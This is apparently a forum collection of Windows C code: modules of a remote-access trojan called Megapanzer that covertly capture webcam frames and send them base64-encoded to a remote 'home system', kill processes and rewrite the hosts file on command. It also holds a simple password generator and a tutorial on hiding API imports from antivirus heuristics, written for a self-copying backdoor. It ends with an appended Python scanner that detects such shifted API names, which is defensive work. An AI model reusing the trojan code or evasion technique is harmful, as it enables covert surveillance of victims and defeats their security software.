    char *lEncodedData = NULL;
    DWORD lBytesRead = 0;
    char lTemp[MAX_BUF_SIZE + 1];
    int lFuncRetVal = 0;
    PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter;
    SYSTEMTIME lSystemTime;

    /*
     * initialize values
     */
    ZeroMemory(&lCapStat, sizeof(CAPSTATUS));
    ZeroMemory(&lSystemTime, sizeof(lSystemTime));
    ZeroMemory(lJPGFileBaseName, sizeof(lJPGFileBaseName));
    GetLocalTime(&lSystemTime);
    snprintf(lJPGFileBaseName, sizeof(lJPGFileBaseName) - 1, "%04d-%02d-%02d-%02d-%02d-%02d.jpg",
             lSystemTime.wYear, lSystemTime.wMonth, lSystemTime.wDay,
             lSystemTime.wHour, lSystemTime.wMinute, lSystemTime.wSecond);
    ZeroMemory(lTemp, sizeof(lTemp));
    _snprintf(lTemp, sizeof(lTemp) - 1, "<webcam>");
    lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0);

    /*
     * capture webcam frame
     */
    Sleep(500);
    lWndVideoHandle = capCreateCaptureWindow("WebCam",WS_CHILD, 0, 0, 320, 240,(HWND) gWND, (int) 1);
    capDriverConnect(lWndVideoHandle, 0);
    Sleep(1000);
    capGetStatus(lWndVideoHandle, &lCapStat, sizeof(CAPSTATUS));
    capGrabFrame(lWndVideoHandle);
    capEditCopy(lWndVideoHandle);
    capFileSaveDIB(lWndVideoHandle, lBMPFileName) ;
    capDriverDisconnect(lWndVideoHandle) ;
    DestroyWindow(lWndVideoHandle);
    convertBMP2JPG(lBMPFileName, lJPGFileName);

    if ((lFileHandle = CreateFileA(lJPGFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE)
    {
        lJPGFileSize = GetFileSize(lFileHandle, 0);

        /*
         * encode created jpg file
         */
        if ((lPreEncodedData = (char *) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, lJPGFileSize * 2)) != NULL)
        {
            ReadFile(lFileHandle, lPreEncodedData, lJPGFileSize, (unsigned long *) &lBytesRead, NULL);
            CloseHandle(lFileHandle);

            if ((lEncodedData = (char *) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, lJPGFileSize * 2)) != NULL)
            {
                /*
                 * transfer picture data to home system
                 */
                Base64encode(lEncodedData, lPreEncodedData, lBytesRead);
                ZeroMemory(lTemp, sizeof(lTemp));
                _snprintf(lTemp, sizeof(lTemp) - 1, "<filename>%s</filename><filecontent>", lJPGFileBaseName);
                lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0);
                lFuncRetVal = send(lCommandStructure->lRemoteSocket, lEncodedData, Base64encode_len(lBytesRead) - 1, 0);
                ZeroMemory(lTemp, sizeof(lTemp));
                _snprintf(lTemp, sizeof(lTemp) - 1, "</filecontent>");
                lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0);
            } // if ((lEncodedData = (char *) He...
        } // if ((lPreEncodedData = (char *) HeapAlloc(GetP...
    } // if ((lFileHandle = CreateFileA(lJPGFileFullPath,...

    ZeroMemory(lTemp, sizeof(lTemp));
    _snprintf(lTemp, sizeof(lTemp) - 1, "</webcam>");
    lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0);

    /*
     * cleaning up before returning
     */
    DeleteFile("info.bmp");
    DeleteFile("info.jpg");
    return(lRetVal);
}

Kill Process by PID
Credit: carrumba

#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "Megapanzer_Definitions.h"

DWORD WINAPI killProcessByPID(PVOID pParameter)
{
    int lRetVal = 0;
    HANDLE lProcessHandle = INVALID_HANDLE_VALUE;
    char lTemp[MAX_BUF_SIZE + 1];
    char lProcessName[MAX_BUF_SIZE + 1];
    int lFuncRetVal = 0;
    PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter;
    HMODULE lModuleHandle;
    DWORD cbNeeded;

    ZeroMemory(lProcessName, sizeof(lProcessName));
    strcpy(lProcessName, "Unknown");
    ZeroMemory(lTemp, sizeof(lTemp));
    _snprintf(lTemp, sizeof(lTemp) - 1, "<killprocess><msg>Could not kill process \"%s\"</msg></killprocess>", lCommandStructure->sCommandString);

    if ((lProcessHandle = OpenProcess(PROCESS_TERMINATE, FALSE, atoi(lCommandStructure->sCommandString))) != INVALID_HANDLE_VALUE)
    {
        if (EnumProcessModules(lProcessHandle, &lModuleHandle, sizeof(lModuleHandle), &cbNeeded))
            GetModuleBaseName(lProcessHandle, lModuleHandle, lProcessName, sizeof(lProcessName) - 1);

        if (TerminateProcess(lProcessHandle, (DWORD) -1))
        {
            ZeroMemory(lTemp, sizeof(lTemp));
            _snprintf(lTemp, sizeof(lTemp) - 1, "<killprocess><msg>Killed process \"%s\" (pid %s) successfully</msg></killprocess>", lProcessName, lCommandStructure->sCommandString);
        }
        CloseHandle(lProcessHandle);
    }

    lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0);
    return(lRetVal);
}

Kill Process By name
Credit: carrumba

#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#include "Megapanzer_Definitions.h"

DWORD WINAPI killProcessByName(PVOID pParameter)
{
    int lRetVal = 0;
    int lFuncRetVal = 0;
    char lTemp[MAX_BUF_SIZE + 1];
    PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter;
    HANDLE hProcessSnap;
    HANDLE hProcess;
    PROCESSENTRY32 pe32;
    DWORD dwPriorityClass;

    if (lCommandStructure->sCommandString != NULL)
    {
        if((hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE)
        {
            lRetVal = 1;
            goto END;
        }

        pe32.dwSize = sizeof(PROCESSENTRY32);
        if(!Process32First(hProcessSnap, &pe32))
        {
            lRetVal = 2;
            goto END;
        }

        do
        {
            if(!strcmp(pe32.szExeFile, lCommandStructure->sCommandString))
            {
                hProcess = OpenProcess(PROCESS_TERMINATE,0, pe32.th32ProcessID);
                TerminateProcess(hProcess,0);
                CloseHandle(hProcess);
            }
        } while(Process32Next(hProcessSnap,&pe32));
    }

END:
    if (hProcessSnap != INVALID_HANDLE_VALUE)
        CloseHandle(hProcessSnap);
    return(lRetVal);
}

Modify hosts file
Credit: carrumba

#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#include "Megapanzer_Definitions.h"

DWORD WINAPI addHostsEntry(PVOID pParameter)
{
    int lRetVal = 0;
    int lFuncRetVal = 0;
    char lTemp[MAX_BUF_SIZE + 1];
    char lTemp2[MAX_BUF_SIZE + 1];
    char *lTempPointer = NULL;
    DWORD dwWritten = 0;
    HANDLE lFileHandle = INVALID_HANDLE_VALUE;
    PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter;

    if (lCommandStructure->sCommandString != NULL)
    {
        ZeroMemory(lTemp, sizeof(lTemp));
        snprintf(lTemp, sizeof(lTemp) - 1, "\r\n%s", lCommandStructure->sCommandString);

        if ((lFileHandle = CreateFile(HOSTS_FILE, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE)
        {
            SetFilePointer(lFileHandle,0,0,FILE_END);
            WriteFile(lFileHandle, lTemp, strlen(lTemp), &dwWritten, NULL);
            CloseHandle(lFileHandle);
        }
    }
    return(lRetVal);
}

DWORD WINAPI removeHostsEntry(PVOID pParameter)
{
    int lRetVal = 1;
    int lFuncRetVal = 0;
    char lTemp[MAX_BUF_SIZE + 1];
    char lReadBuffer[MAX_BUF_SIZE + 1];
    PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter;
    FILE *lFileOldHostsHandle = NULL;
    FILE *lFileNewHostsHandle = NULL;

    if (lCommandStructure != NULL && lCommandStructure->sCommandString != NULL)
    {
        if ((lFileOldHostsHandle = fopen(HOSTS_FILE, "r")) != NULL)
        {
            ZeroMemory(lTemp, sizeof(lTemp));
            snprintf(lTemp, sizeof(lTemp) - 1, "%s.tmp", HOSTS_FILE);

            if ((lFileNewHostsHandle = fopen(lTemp, "w")) != NULL)
            {
                while (!feof(lFileOldHostsHandle))
                {
                    ZeroMemory(lReadBuffer, sizeof(lReadBuffer));
                    if (fgets(lReadBuffer, sizeof(lReadBuffer) - 1, lFileOldHostsHandle) > 0)
                    {
                        if (strstr(lReadBuffer, lCommandStructure->sCommandString) == NULL)
                            fprintf(lFileNewHostsHandle, lReadBuffer);
                        else
                            lRetVal = 0;
                    }
                }
                fclose(lFileNewHostsHandle);
            }
            fclose(lFileOldHostsHandle);
        }
    }

END:
    if (lRetVal == 0)
    {
        ZeroMemory(lTemp, sizeof(lTemp));
        snprintf(lTemp, sizeof(lTemp) - 1, "%s.tmp", HOSTS_FILE);
        DeleteFile(HOSTS_FILE);
        MoveFile(lTemp, HOSTS_FILE);
    }
    return(lRetVal);
}

Very simple pass gen

/*
   More simple pass generator; inspired by carb0n passgen code on this forum
   Lamecoded by : x.exexe_ // from newbie to newbies
*/
#include <iostream>
#include <fstream>
#include <string>
#include <cstdlib>   // rand, srand
#include <ctime>     // time

void RndPass(int len, std::string &pesw)
{
    // table with chars, can re-define
    // (the array is not NUL-terminated, so its size comes from sizeof, not strlen)
    char c_table[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
                      'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
                      'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
                      'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9'};
    const int table_size = sizeof(c_table) / sizeof(c_table[0]);

    srand(time(NULL));
    for(; len > 0; len--)                    // save random number (as char)
        pesw += c_table[ rand() % table_size ]; // to pesw string
}

int main()
{
    int len;
    std::string passwd = "";

    std::cout << "\t\tSimply pesvrd gen by x.exexe_\n" << std::endl;
    std::cout << "Enter password length (number): ";
    std::cin >> len;

    RndPass(len,passwd);

    std::cout <<"Ur pass is : \n" << passwd << std::endl;
    std::cout << "Make internet better!" << std::endl;

    // create file stream with append mode
    std::ofstream PassFileStream("piss.txt", std::ios::app);
    if ( PassFileStream.is_open() )         // if stream open is ok ...
        PassFileStream << passwd << "\n\n";  // ... write pass to file
    PassFileStream.close();                  // close stream

    std::cin.get(); // hit any key
    return 0;
}
-
# Title: API crypting (or: how to trick the heuristic detection of antivirus software)
# Date: 03.03.2008
# Author: Eddy14
# Website: www.eddys-blog.6x.to
# Email: eddy14@pen.tj
# Contents:
#   0x1 - Preface
#   0x2 - Introduction
#   0x3 - API commands
#   0x4 - The source code (and explanation)
#   0x5 - Deeper insight (reverse engineering)
#   0x6 - Conclusion / Links

#########################
#     0x1 - Preface     #
#########################

Hello and welcome to my API crypting tutorial :) I wanted to have this paper finished 2.5 months ago, but somehow my Dev-C++ went on strike and otherwise I had no particular desire to do it :P

Enough chatter, let me first tell you what background you should bring to this tutorial:

- Good knowledge of C (pointers, typecasting, etc.)
- Skills in Windows programming (the WinAPI!)
- You should have worked with DLLs before (important, otherwise the DLL-like code will confuse you)
- You should have encrypted strings before (Caesar encryption is sufficient)

On to the introduction :)

#########################
#  0x2 - Introduction   #
#########################

Well, first: why am I writing this tutorial? First, because I have written too few tutorials, and second, because I had just been writing a remote shell for Windows (a little backdoor; btw, about the remote shell, i.e. pipes under Windows in general, I will also write a tutorial) and, together with born2die, found that the antivirus software detected my backdoor. That was inexplicable to me, because it was self-written software that no signature should fit! It was the stinking heuristic!
In my program, something was implemented that looked roughly like this:

-------------------------
GetWindowsDirectory(&buffer, sizeof(buffer));
CopyFile(argv[0], buffer, FALSE);
-------------------------

(in between, a strcat to append the file name)

Which said to Windows, more or less:

-------------------------
Find your Windows directory and then copy me there!
-------------------------

And to Antivir it looked like:

-------------------------
Buuuh, I'm eeeevil and a virus! I'm now going to copy myself, totally leet, into the Windows directory!
-------------------------

Which said to me, more or less:

-------------------------
Suck my balls!
-------------------------

Well, joking aside. It did not take me long to realize that the antivirus recognized the GetWindowsDirectory in the program, followed by CopyFile, as malware (I don't know any other software that would sensibly use something like this, or maybe?). In any case, the antivirus program detects my calls to this API, but not if they do not exist in the compiled state and only appear at runtime, i.e. dynamically! You ask how to do this? Well, quite simply: we do not call GetWindowsDirectory directly (so that our program does not import it directly, and thus the AV knows nothing about it) but only when we run! It is very simple. You should take a look at the PE (Portable Executable) format. There you will at some point come across the IAT (Import Address Table). This table contains the addresses of the respective imported functions (from foreign DLLs). Based on this table, one can understand which API functions the program uses. There are also functions that are used during the program's lifetime but do not appear in this table (for example if a DLL is loaded at runtime). That is what I mean by "dynamic". (More on the IAT can be found here: http://sandsprite.com/CodeStuff/Understanding_imports.html) You still ask how it works?
Then first read the chapter "API commands", and in the "Source code" part I will explain everything precisely :)

#########################
#  0x3 - API commands   #
#########################

First, the three "commands" we will try to use:

- GetWindowsDirectory (GetWindowsDirectoryA)
- CopyFile
- MessageBox (MessageBoxA)

And the two major commands without which API crypting would probably not be possible:

- LoadLibrary
- GetProcAddress

#########################
# 0x4 - The source code #
#########################

Since you now know which API calls we need, you can hopefully guess what comes now. Or still not? Well, I will reveal the whole secret: we will encrypt our functions as strings, and then load and call them via LoadLibrary and GetProcAddress. So in the compiled state the executable file contains no information about e.g. GetWindowsDirectory, only about LoadLibrary and GetProcAddress. Whoever does not know these two functions should please read through my requirements again, because there it says: you should have loaded a DLL before! Well, the secret is revealed! But it is certainly not yet clear to us how the whole thing is supposed to work. I will now present code and, as always, explain it of course :) BTW, I use raw GCC under Windows here, Dev-C++ sucked, that's why.

-------------------------
#include <stdio.h>
#include <windows.h>

int crypt(char *str);

int main(int argc, char *argv[])
{
    char hello[] = "Hello World";

    crypt(hello);
    printf("%s\n", hello);
    system("PAUSE");
    return 0;
}
-------------------------

Here you can see in advance what our test program does. There is a so-called "crypt" function for our test string, and then the result is printed (+ waits for further input).
Everybody should have understood that, because in principle it is only about the "crypt" function, which I will show you now:

-------------------------
int crypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++) {
        ord = (int) str[length];  /* ASCII value of the current character */
        ord = ord + 1;            /* shift it one place up the ASCII table */
        chr = (char) ord;
        str[length] = chr;        /* write the shifted character back */
    }
    return 0;
}
-------------------------

Sooo, does it look bad or not at all? Our loop goes through all the characters. With each pass, the current character is read. Now its ASCII value is taken [=> see "(int) str[length]"]. The ASCII value of "H" is 72. Then 1 is added to this value. So the value is 73. Now the ASCII character for 73 is stored back in "chr". What was done here is simple: it was encrypted! A character was shifted one position to the right in the alphabet! So "I" should come out, and it does too! And so on with every other character. Even with characters that are not in the alphabet, because it is about the ASCII table after all! So a space becomes an exclamation mark, because the space is in the ASCII table with number 32, and the following 33 is an exclamation mark :) Now think briefly about the decrypt method. Well, what does it most likely look like? Exactly, the same except that instead of adding 1, we subtract 1.

-------------------------
int decrypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++) {
        ord = (int) str[length];
        ord = ord - 1;            /* shift it one place back down */
        chr = (char) ord;
        str[length] = chr;
    }
    return 0;
}
-------------------------

Our encryption method is ready. You can encrypt the string however you want, the main thing is that you can decrypt it again.
We now test our program:

-------------------------
#include <stdio.h>
#include <string.h>
#include <windows.h>

int crypt(char *str);
int decrypt(char *str);

int main(int argc, char *argv[])
{
    char hello[] = "Hello World";

    crypt(hello);
    printf("%s\n", hello);
    system("PAUSE");
    return 0;
}

int crypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++) {
        ord = (int) str[length];
        ord = ord + 1;
        chr = (char) ord;
        str[length] = chr;
    }
    return 0;
}

int decrypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++) {
        ord = (int) str[length];
        ord = ord - 1;
        chr = (char) ord;
        str[length] = chr;
    }
    return 0;
}
-------------------------

For the readers who use GCC (who probably already know how to compile :P):

-------------------------
gcc -o cryptme.exe cryptme.c
-------------------------

Start it and what do you see? It prints...

-------------------------
Ifmmp!Xpsme
Press any key . . .
-------------------------

Our "Hello World" encrypted (using our algorithm) means:

-------------------------
Ifmmp!Xpsme
-------------------------

OK, good. Now everything runs. If you absolutely want to, you can also test the decrypt function :) We will now make another attempt: replace "Hello World" above with "MessageBoxA". It tells us:

-------------------------
NfttbhfCpyB
Press any key . . .
-------------------------

As you probably suspected, we will encrypt MessageBox for our attempts. Perhaps you ask why we encrypt MessageBoxA and not MessageBox? To be exact, there is no MessageBox. Windows generally has 2 versions of (every?) function that works with strings. One that ends with A and one that ends with W. Those with A are the ASCII versions, and those with W (for Wide Char) are the Unicode versions. Depending on the compiler setting, one of these versions is selected. So you can either adjust the settings, or use the versions directly (so "MessageBoxA" instead of "MessageBox" in the code example).
OK, let's jump back on topic (a little English is a must ;)). If you have ever worked with DLLs (if not, then I urge you once again!) then you probably know the two functions LoadLibrary and GetProcAddress. We will now use these to call our encrypted functions! Let's go! (a bit directly translated :P)

-------------------------
/* the original declared MyMessageBox as a plain FARPROC; a typed
   function pointer lets the compiler check the four arguments */
typedef int (WINAPI *MessageBoxA_t)(HWND, LPCSTR, LPCSTR, UINT);

int main(int argc, char *argv[])
{
    char func_crypted[] = "NfttbhfCpyB";
    HMODULE dll;
    MessageBoxA_t MyMessageBox;

    decrypt(func_crypted);
    dll = LoadLibrary("user32.dll");
    MyMessageBox = (MessageBoxA_t) GetProcAddress(dll, func_crypted);
    MyMessageBox(0, "In working dude ;)", "yeaaah", MB_OK);
    system("PAUSE");
    return 0;
}
-------------------------

We declare "dll" and "MyMessageBox" for later use with LoadLibrary and GetProcAddress. Then we load user32.dll (because our MessageBox is declared there, which you can all look up in the MSDN). Once we have "dll" where we wanted it, we squeeze it into GetProcAddress and at the same time tell it that the function to be loaded is in "func_crypted". You know that "NfttbhfCpyB" has become the well-known "MessageBoxA". So we say nothing more than:

-------------------------
Load the function MessageBoxA from user32.dll
-------------------------

Then we finally have everything we want in MyMessageBox! We can now just call it as we would have done with MessageBox (or MessageBoxA). Alright dudes? =) In the case of GetWindowsDirectory it was not much different, except that I had to load kernel32.dll instead of user32.dll :) So, now follows a chapter for all those interested in reverse engineering (i.e. cracking); all those who are not into this area, please skip it, it would probably just confuse you!

#########################
#  0x5 - Deeper insight #
#########################

So, you leet crackers :P, fire up your favourite disassembler (in my case OllyDBG). I will explain all the steps here with OllyDBG.
Compile this source to try it:

-------------------------
#include <stdio.h>
#include <windows.h>

int main()
{
    Sleep(1000);
    MessageBox(0, "test", "test", MB_OK);
    return 0;
}
-------------------------

It is useless, I know! But it is only for better understanding. As you can easily recognize, the program waits for one second, then displays a MessageBox. Now we load this program into Olly. Go into the CPU window (i.e. the state you get as soon as a program loads in Olly; to be on the safe side press the "C" at the top of the toolbar) and now make a right click. Now select "Search for -> All intermodular calls". Look closely at what you get, there is really not much to read. Best look at the area below the red line. Here is what you will discover:

-------------------------
00401321 | CALL <JMP.&KERNEL32.Sleep>       | kernel32.Sleep
00401348 | CALL <JMP.&USER32.MessageBoxA>   | USER32.MessageBoxA
-------------------------

(The addresses may vary)

You can see that 2 functions are implemented (or rather: called). Once our Sleep, and once our MessageBox. That is what an antivirus program can recognize. But with our encryption you cannot see it! Since our program does not yet know at start time (or before) that it should decrypt a function name and call the corresponding function! So, now compile our MessageBoxA example and load it in Olly. Go again to "Search for -> All intermodular calls" and you land in the same window again. Take a look at the red line again, and you recognize your API calls! LoadLibraryA, GetProcAddress, system and a few others :) But hm, where is our MessageBoxA? There is none! Since our program does not know it at this time! We go back to the CPU window (click on the "C" in the menu) and make a quick click in the box at the bottom left, then right click and select "Search for -> Binary string". First, we select "Entire block" and then jump into the ASCII field and type...
-------------------------
NfttbhfCpyB
-------------------------

...in. This is our encrypted "MessageBoxA", in case you forgot. And Olly found it! You see, no function call was detected. Let's go a little further, after all it is called "insight". So we set a breakpoint on the string. Mark it, make a right click, go to "Breakpoint" and you see a small menu. We want a hardware breakpoint, but on "Access" or on "Write"? If we set one on Access, then we would probably break when the string is decrypted and when it is used (i.e. when it is passed to GetProcAddress). Or we take "Write" and then break immediately when the string starts to be decrypted. We take the latter ;) And as a DWORD (to be on the safe side). Press F9 once and off you go! We break at:

-------------------------
0040131A  A1 00304000    MOV EAX, DWORD PTR DS:[403000]
0040131F  8945 E8        MOV DWORD PTR SS:[EBP-18], EAX   ; <- HERE
-------------------------

Hm, but what's in EAX? I can tell you! "7474664E", which corresponds to "ttfN", i.e. "Nftt", which means that the first 4 bytes of the encrypted string have been copied :) Now they are stored in EBP-18. That will be the "cache", or rather the "final storage", where the decrypted "MessageBoxA" is kept. The whole procedure with the copy lines:

-------------------------
0040131A  A1 00304000    MOV EAX, DWORD PTR DS:[403000]
0040131F  8945 E8        MOV DWORD PTR SS:[EBP-18], EAX   ; <- copy the first 4 bytes
00401322  A1 04304000    MOV EAX, DWORD PTR DS:[403004]
00401327  8945 EC        MOV DWORD PTR SS:[EBP-14], EAX   ; <- copy the next 4 bytes
0040132A  A1 08304000    MOV EAX, DWORD PTR DS:[403008]
0040132F  8945 F0        MOV DWORD PTR SS:[EBP-10], EAX   ; <- next 4 bytes ...
00401332  8D45 E8        LEA EAX, DWORD PTR SS:[EBP-18]   ; <- EAX now holds the address of the string
00401335  890424         MOV DWORD PTR SS:[ESP], EAX      ; <- which is stored at ESP
-------------------------

I wonder why the compiler did this so cumbersomely, but whatever. Shortly after this follows a call!
-------------------------
00401338  E8 EB000000    CALL 00401428                    ; <- decrypt
-------------------------

As my comment already promised, decryption happens here! So let's trace into it, so that our F7 key also has something to do :)

-------------------------
00401435  8B45 08        /-> MOV EAX, DWORD PTR SS:[EBP+8]       ; <- load the string into EAX
00401438  890424         |   MOV DWORD PTR SS:[ESP], EAX         ; <- save it at ESP
0040143B  E8 F0050000    |   CALL <JMP.&msvcrt.strlen>           ; <- determine the length of the string
00401440  3945 FC        |   CMP DWORD PTR SS:[EBP-4], EAX       ; <- all characters done?
00401443  73 2C          |   JNB SHORT 00401471                  ; <- then jump out of the loop!
00401445  8B45 08        |   MOV EAX, DWORD PTR SS:[EBP+8]       ; <- the address of the string into EAX
00401448  0345 FC        |   ADD EAX, DWORD PTR SS:[EBP-4]       ; <- the current character ...
0040144B  0FBE00         |   MOVSX EAX, BYTE PTR DS:[EAX]        ; <- ... copied into EAX
0040144E  8945 F4        |   MOV DWORD PTR SS:[EBP-C], EAX       ; <- stored in EBP-C
00401451  8D45 F4        |   LEA EAX, DWORD PTR SS:[EBP-C]       ; <- EAX holds the address of the current character
00401454  FF08           |   DEC DWORD PTR DS:[EAX]              ; <- HERE! decrease it by one
00401456  8B45 F4        |   MOV EAX, DWORD PTR SS:[EBP-C]       ; <- EAX holds the decoded character
00401459  8845 FB        |   MOV BYTE PTR SS:[EBP-5], AL         ; <- store the new character in EBP-5
0040145C  8B45 08        |   MOV EAX, DWORD PTR SS:[EBP+8]       ; <- EAX again has the address of the normal string
0040145F  8B55 FC        |   MOV EDX, DWORD PTR SS:[EBP-4]       ; <- EDX is 0
00401462  01C2           |   ADD EDX, EAX                        ; <- add EAX to EDX
00401464  0FB645 FB      |   MOVZX EAX, BYTE PTR SS:[EBP-5]      ; <- EAX is the decoded character again
00401468  8802           |   MOV BYTE PTR DS:[EDX], AL           ; <- the decrypted character is written into the string
0040146A  8D45 FC        |   LEA EAX, DWORD PTR SS:[EBP-4]       ; <- will be increased (=> next character)
0040146D  FF00           |   INC DWORD PTR DS:[EAX]              ; <- and written back
0040146F  EB ^C4         \-  JMP SHORT 00401435                  ; <- back to the beginning of the loop
-------------------------

Oh man! So much to read and understand!
The comments should enhance the adventure, however ;) In brief: decrease all characters by one! Even shorter: decrypt! But it is always nice to see what the compiler makes of our beautiful C code, isn't it? =) So, now we set a breakpoint after the JMP, let the program break, and now have our unencrypted "MessageBoxA" lying in memory ===) You do not believe me? Do a quick GOTO 0022FF60 and see for yourself! :P On with the code. So that our F8 key does not go mouldy, we tap on it a bit, so that we also come back out of the CALL. And we see something exciting! Trace a little further down and, after the line with "%s", we see a "user32.dll", which looks very nice! And then there is a CALL to LoadLibraryA, and a little bit below a GetProcAddress. Uhh, do you also get this tingling in your stomach when everything runs perfectly? We set a breakpoint on the call to GetProcAddress because I want to show you something! When Olly breaks, look at the stack.

-------------------------
0022FF20  7E360000  | hModule = 7E360000 (user32)
0022FF24  0022FF60  \ ProcNameOrOrdinal = "MessageBoxA"
-------------------------

So much information at once! :O We recognize the HMODULE from our code (as a hex value in its natural form), and at the same time we recognize that we are looking in user32 for "MessageBoxA". We step through this briefly and then see CALL EAX: what a miracle, our MessageBox was loaded! For me it is "7E3A058A", and when I look in user32.dll => it agrees ;) You can convince yourself: right click in the CPU window, "View -> Modules 'user32'", now right click "Goto -> Expression", enter the address, and whoosh, it looks very much like a clean function, huh? OK, I think we have traced enough code, we have probably learned more (or not) than the tutorial was supposed to provide.
I hope you enjoyed part of it, if you've read through it ^^

#########################
# 0x6 - Conclusion/Links#
#########################

Pffft, that's it from me again :) The paper is unfortunately not as long as I had hoped :/ But I hope at least one person has learned something from this tutorial :) This paper is released under the GNU Free Documentation License, so it is allowed to modify and distribute it as you like, as long as my name still stands on it. Oh, you know what, you can even remove my name, the main thing is that people learn from this paper xD, that's the way ;) So, as a sort of "annex", I have copied my whole source code in here, have fun with it, and read it again :)

cryptme.c
-------------------------
#include <stdio.h>
#include <string.h>
#include <windows.h>

int crypt(char *str);
int decrypt(char *str);

int main(int argc, char *argv[])
{
    char hello[] = "Hello World";

    crypt(hello);
    printf("%s\n", hello);
    system("PAUSE");
    return 0;
}

int crypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++) {
        ord = (int) str[length];
        ord = ord + 1;
        chr = (char) ord;
        str[length] = chr;
    }
    return 0;
}

int decrypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++) {
        ord = (int) str[length];
        ord = ord - 1;
        chr = (char) ord;
        str[length] = chr;
    }
    return 0;
}
-------------------------

mymessagebox.c
-------------------------
#include <stdio.h>
#include <string.h>
#include <windows.h>

int crypt(char *str);
int decrypt(char *str);

/* typed function pointer instead of a bare FARPROC so the call is checked */
typedef int (WINAPI *MessageBoxA_t)(HWND, LPCSTR, LPCSTR, UINT);

int main(int argc, char *argv[])
{
    char func_crypted[] = "NfttbhfCpyB";
    HMODULE dll;
    MessageBoxA_t MyMessageBox;

    decrypt(func_crypted);
    dll = LoadLibrary("user32.dll");
    MyMessageBox = (MessageBoxA_t) GetProcAddress(dll, func_crypted);
    MyMessageBox(0, "In working dude ;)", "yeaaah", MB_OK);
    system("PAUSE");
    return 0;
}

int crypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++) {
        ord = (int) str[length];
        ord = ord + 1;
        chr = (char) ord;
        str[length] = chr;
    }
    return 0;
}

int decrypt(char *str)
{
    int length;
    char chr;
    int ord;

    for (length = 0; length < strlen(str); length++) {
        ord = (int) str[length];
        ord = ord - 1;
        chr = (char) ord;
        str[length] = chr;
    }
    return 0;
}
-------------------------
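Added example, not part of Eddy14's tutorial or of this post: the same shift-by-one scheme seen from the defender's side, a Python scanner that looks for well-known export names hidden under any constant byte shift, which is exactly what "NfttbhfCpyB" is. The API list and the sample byte buffer are constructed for this example.

```python
"""Scanner for API names hidden by a constant byte shift (added example).

The tutorial's crypt()/decrypt() add or subtract 1 from every character of
"MessageBoxA", giving "NfttbhfCpyB". Static import analysis no longer sees
the name, but the shifted string still sits in the binary, so a defender can
simply look for watched export names under every small shift.
"""

# Export names to look for. The first three are the ones the tutorial
# discusses; the list itself is an assumption of this example, extend it.
WATCHED_APIS = [
    "MessageBoxA",
    "GetWindowsDirectoryA",
    "CopyFileA",
    "LoadLibraryA",
    "GetProcAddress",
]


def shift_string(text: str, delta: int) -> str:
    """Python version of the tutorial's crypt() (delta=1) and decrypt()
    (delta=-1): each character moves delta places along the ASCII table,
    with no wrap-around, so a space becomes '!' and 'y' + 3 becomes '|'."""
    return "".join(chr(ord(c) + delta) for c in text)


def find_shifted_api_names(data: bytes, names=WATCHED_APIS, max_shift=25):
    """Return sorted (offset, shift, api_name) tuples for every watched name
    that occurs in `data` shifted by a constant 1..max_shift.

    Shift 0 is skipped on purpose: an unshifted name is an ordinary import
    string that the IAT (and any import viewer) already reveals."""
    hits = []
    for name in names:
        for shift in range(1, max_shift + 1):
            # Printable ASCII plus a shift of at most 25 stays below 256,
            # so latin-1 maps the shifted name 1:1 onto bytes.
            needle = shift_string(name, shift).encode("latin-1")
            start = 0
            while (pos := data.find(needle, start)) != -1:
                hits.append((pos, shift, name))
                start = pos + 1
    return sorted(hits)


# Constructed sample resembling a .data section: two real DLL names, the
# tutorial's "NfttbhfCpyB", GetWindowsDirectoryA shifted by 1, CopyFileA
# shifted by 3, and one genuine (unshifted) import name.
SAMPLE_DATA = (
    b"\x00\x00user32.dll\x00"
    b"NfttbhfCpyB\x00"
    b"kernel32.dll\x00"
    b"HfuXjoepxtEjsfdupszB\x00"
    b"Frs|IlohD\x00"
    b"GetProcAddress\x00"
)


def scan_report(data: bytes = SAMPLE_DATA) -> list:
    """One human-readable line per hit, for a quick triage listing."""
    return [
        f"offset 0x{off:04x}: shift {shift:2d} -> {name}"
        for off, shift, name in find_shifted_api_names(data)
    ]


if __name__ == "__main__":
    for line in scan_report():
        print(line)
```

The tutorial's own OllyDbg session shows the limit of static matching: once GetProcAddress runs, its argument is the plain "MessageBoxA", so monitoring that call at runtime catches the name whatever encoding was used. This scanner only covers constant-shift encodings like the one above.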
-
